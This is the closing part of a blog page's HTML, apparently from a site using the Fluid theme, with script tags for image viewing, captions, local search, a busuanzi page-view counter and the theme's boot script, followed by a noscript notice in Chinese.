    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
